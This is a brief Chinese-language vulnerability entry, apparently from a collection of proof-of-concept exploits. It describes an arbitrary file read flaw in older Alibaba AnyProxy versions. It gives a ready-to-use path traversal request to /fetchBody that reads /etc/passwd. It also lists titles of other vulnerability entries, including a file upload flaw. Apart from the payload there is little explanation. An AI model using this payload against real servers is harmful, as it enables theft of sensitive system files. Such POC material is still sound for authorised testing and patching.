Alibaba AnyProxy 低版本存在任意文件读取,通过漏洞,攻击者可以获取服务器敏感信息
页面如下
验证POC为
/fetchBody?id=1/../../../../../../../../etc/passwd
MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543 CMA客诉管理系统 upFile.ashx 任意文件上传漏洞